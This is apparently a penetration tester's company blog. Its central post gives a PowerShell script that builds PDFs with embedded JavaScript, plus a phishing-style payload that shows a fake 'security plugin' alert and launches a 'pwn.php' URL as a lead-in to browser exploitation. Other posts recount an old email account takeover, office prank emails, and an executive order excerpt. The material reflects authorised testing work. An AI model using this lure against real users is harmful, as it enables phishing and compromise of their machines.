Meet James Shewmaker. James Shewmaker is the founder of and principal consultant at Bluenotch Corporation in Long Beach, California, which provides customized security services focusing on investigations, penetration testing, and analysis.
James authored and maintains the post-exploitation content in the SANS SEC660: Advanced Penetration Testing, Exploit Writing, and Ethical Hacking course. Before becoming a SANS Certified Instructor in 2009, his creative technical work led him on many adventures, including “The Great Translator Invasion of 2003.” Read more at: https://cyber-defense.sans.org/blog/2018/10/22/shewmaker
Find me @jimshew
Instructor for SANS courses https://www.sans.org/instructors/james-shewmaker
- Updated logo
- New website
- Yearly duty – corporation tax prep ( excuse me while I hibernate and drowned in expense reports )
- Make ten more checklist + reminder lists.
Happy New Year + Happy Groundhog Day. You would be surprised how many *ahem* younger people do not know what I’m referring to when I say “alarm clock scene – Bill Murray Groundhog Day” ahhhh … and you guys can now “just Google it” on YouTube for instant gratification and add to your knowledge base category and tags – the cult epic movies that are referenced in other movies. Circa 1993+ I had to record it on a VHS if I wanted to watch that scene again (and worse yet, only on a tube television – what mobile smart phone?!)
Yes. I do wake up at 6am. Groundhog Day can be classified as a real life documentary, right?
Groundhog Day Scene HERE >
+ | shew |
In 2015, we drank a lot of Stumptown Coffee – roughly 900 homebrewed or take away cups and thirty 12oz whole bean bags bought. It feuled a busy year as we worked around the world clock. We reminisced about the 2000s – everything from our involvment of Y2K radio reprogramming, The Great Translator Invasion, and the time the office got burglarized and the thieves took all the junk computers saved for an e-recycle drop off (yes!) and stole all the bottled water (shortage / drought in California?!) Needless to say, we have accumulated a lot of stories over the years.
In the cliché of looking back, I realize that there are a lot of projects and lists unfinished to complete in 2015 – two days left! Prioritizing critical events and client visits, come first over completing tasks like “You know < pause > I really need to update a wiki page!” or “Can we set up our twitter to amazon.com order?” And at the same time, those seem faster and easier to do in 10 minutes than what has been on our bucket lists. Anyone want to be an intern? Hah. I guess sipping coffee in 10 minutes became a priority and we had to put down the keyboard while drinking (fear of spillage). All jokes aside, we look forward to 2016. Happy New Year. + | shew |
+ I’ve been focused in 2015 on crafting malicious documents and VM forking.
+ | jim.shew |
When trying to solve a problem, I try to use PowerShell.
During a recent penetration test, I wanted to upload malicious DOC, XLS, and PDF files. I looked around my favorite exploit frameworks:
Metasploit | http://www.metasploit.com
Nishang | https://github.com/samratashok/nishang
Exploit-db | http://www.exploit-db.com/
Core IMPACT | http://www.coresecurity.com/core-impact-pro
Social Engineer Toolkit | https://github.com/trustedsec/social-engineer-toolkit
After some searching, I found Didier’s Steven’s work, realizing I should have looked there first. Didier has PDFid.py for summary analysis and mPDF.py to build it. I wanted to go the PowerShell route, however; all I could find is PDFSharp used for PowerShell print-to-PDF examples. I was surprised that nobody has published something similar to this.
A preliminary test script using the ideas above:
[string]$js = “app.alert(‘boom goes the reader ‘+app.reader);”,
[string]$msg = “Hello JS”,
[string]$filename = “C:\PDF\helloJS.pdf”
Add-Type -Path C:\pdf\PdfSharp-WPF.dll
$doc = New-Object PdfSharp.Pdf.PdfDocument
$doc.Info.Title = $js
$doc.info.Creator = “@jimshew”
$page = $doc.AddPage()
$dictjs = New-Object PdfSharp.Pdf.PdfDictionary
$dictjs.Elements[“/JS”] = New-Object PdfSharp.Pdf.PdfStringObject($doc, $js);
$dict = New-Object PdfSharp.Pdf.PdfDictionary
$pdfarray = New-Object PdfSharp.Pdf.PdfArray
$embeddedstring = New-Object PdfSharp.Pdf.PdfString(“EmbeddedJS”)
$dict.Elements[“/Names”] = $pdfarray
$dictgroup = New-Object PdfSharp.Pdf.PdfDictionary
$doc.Internals.Catalog.Elements[“/Names”] = $dictgroup
On open of the PDF (modern reader with no settings changes ):
Great, now we can taunt the victim, but what about something more interesting, like making external requests?
$js = “app.alert(‘Security Plugin Missing, Launching installer’);app.LaunchURL(‘http://bluenotch.com/pwn.php’,true);”
$msg = “Security Plugin FAIL”,
$filename = “C:\PDF\helloHTTP.pdf”
So it’s easy to see how we can leverage this in a phishing or social engineering attack. In one of the recent assessments, the web portal that housed the PDFs was whitelisted so it didn’t even prompt for the URL redirect! Now it’s ripe for a Browser Exploitation Framework (BeEF) hook or Metasploit browser autopwn.
I’m still exploring the modern PDF functionality to build creative payloads that work on modern readers. One of those features is the form submit functionality, used by the sample webug-reader.pdf in Origami (see work by Frédérick Raynal and Guillaume Delugré below).
I’ll be turning this into a proper PowerShell module soon, (assuming my battery holds out during the next series of flights). For more info along PDF hijinks, you may want to check out:
Origami – a framework for generating malicious PDFs:
Online PDF analyzer:
You probably want to check what app.launchURL destinations are already allowed, here is mine after checking the remember box on the HelloHTTP.pdf :
+ | jimshew |
I was living in southern Idaho
and back then, it meant a requirement to travel. I was just starting a radio internship at a network of stations – format of rock / alt indie and quickly headed to full time work there. Yes, hours of fun, shows, tours, etc. But still needed California vacation time. So yes, 60-80 hours a week in a closet size studio and the need to visit my home, Southern California was a priority. Granted Idaho has great white water rivers and white powder snow capped mountains, but still – surf, sand, and retail sunshine were missing.
The gateway medium? Electronic plane tickets via Expedia and Hotmail. Both I didn’t have yet. So I signed up for a Hotmail account via Internet Explorer. Awwww … I miss those early Passport MSN Messenger – IM and “one new message” bar sounds – nostalgia. Back to rewind, 1999, okay so not everyone had Hotmail yet – mostly Yahoo or AOL and Microsoft recently acquired Hotmail. I still had a difficult time getting my third choice account name. So brainbending – one simple combo was available! Full first name and last initial. Two minutes later done registering to welcome email arrives. Step two – I start to book Expedia … Need an account. My email is already registered?!? What? Okay …. “Forgot password.” Send. You didn’t fail to read the title here, summer of 1999, right? Just checking. Well despite me not caring about the why it was a registered email user account < look, I had late nights, not yet a daily straight up espresso drinker, and really did not think much of it. It was highly likely and logical that I started an account process and forgot to finish one late night > I waited – The Password emailed to me… Some vacationy type password. Again, highly likely I made it that password – no red flag. Odd right? But true. The password was five characters long. High Five. I think about a month later, I forgot the password … Reset and added a “1” Good job? Yes this means more out of town trips were booked.
A couple months later I get an email from the old Hotmail user letting me know it was once his, but he’s “moved on.” < bitter much > And I think we even might of mentioned my hijack of Expedia. Laugh. He had a similar name, lived in Washington state and was a computer nerd of some sort. I still recall his name and he emailed me several years back again just to say hi … Ahem or try to get his email back. I just looked him up on LinkedIn – Senior Infosec Engineer, now lives in Utah. Look it was free Risk-game type takeover. In the words of Seinfeld’s Kramer, “The Ukraine is weak.” + | shew |
Same year, same station, different channel role
It was my job, nay duty, to encourage user security awareness. My favorite technique was to “baggy pants” anyone leaving their email open. They would return to their desk and find an email (from themselves) declaring how cool they are and how their pants are the baggiest. Or a claim that their password was weak and they should change it …+ | jimshew |
P.S. Irony – I was a victim of such ^^ email shenanigans ^^ . + | shew |
In January 2008, the Bush Administration established the Comprehensive National Cybersecurity Initiative (CNCI). Recently, the Obama Administration released several notices on cybersecurity, below is an Executive Order.
By the authority vested in me as President by the Constitution and the laws of the United States of America, it is hereby ordered as follows:
Section 1. Policy. In order to address cyber threats to public health and safety, national security, and economic security of the United States, private companies, nonprofit organizations, executive departments and agencies (agencies), and other entities must be able to share information related to cybersecurity risks and incidents and collaborate to respond in as close to real time as possible.
Continue reading here http://www.whitehouse.gov/the-press-office/2015/02/13/executive-order-promoting-private-sector-cybersecurity-information-shari
It is of note, during this White House Summit held at Stanford University, CEOs from Google, Yahoo, Facebook – absent. Tim Cook, Apple CEO, attended.
SMALL TALK On a coffee + laptop observational side note: I was at a coffeebar on Saturday and there were only Macs everywhere. Yes, I did the 360 check while waiting for my Americano-latte. It’s like you could only stay and drink coffee if you owned an Apple product … and sign on the Square POS iPad (which can we agree we love / hate the emailed receipt?!). So apparently, if I bring my ThinkPad, I might need to trek down to other coffeeshop down the street – they use an older school Point of Sale system and have the most amazing hazelnut gelato. + | shew |
SMALL TALK I’m working on my five year plan, just trying to figure out the font. < that’s a line in the pilot episode of Chuck > I’ll be honest, that was the funniest line, made me laugh and I’ve used it as a tag line — but I never watched past the pilot episode (nor ever used Geek Squad). + | shew |
Since we’re on a television tangent … Just saw esxi console on Blacklist, now I *know* it’s a documentary. + | james.shew |
NERD TALK requires more espresso. And since it’s late, ahem early am and we are up wrestling technical fun time warps, I’ll save my eloquent thoughts for the mid morning first jumpstart shot of caffeine. Thank you Sidecar, Stumptown, Rose Park, and even in the pinch, Starbucks for the assists.
+ | shew |
UPDATE 15.48 | A Nice SRP Circumventing Trick | During a recent penetration test, my goal was to smuggle data around out of a hardened virtual application. This particular test, included a vApp designed to restrict everything not needed to display and edit a Word document. Between Group Policy Objects and Software Restriction Policies, there were practically no third-party applications available to manipulate, and most Windows internal programs were either removed or hijacked by a Digital Rights Management DLL.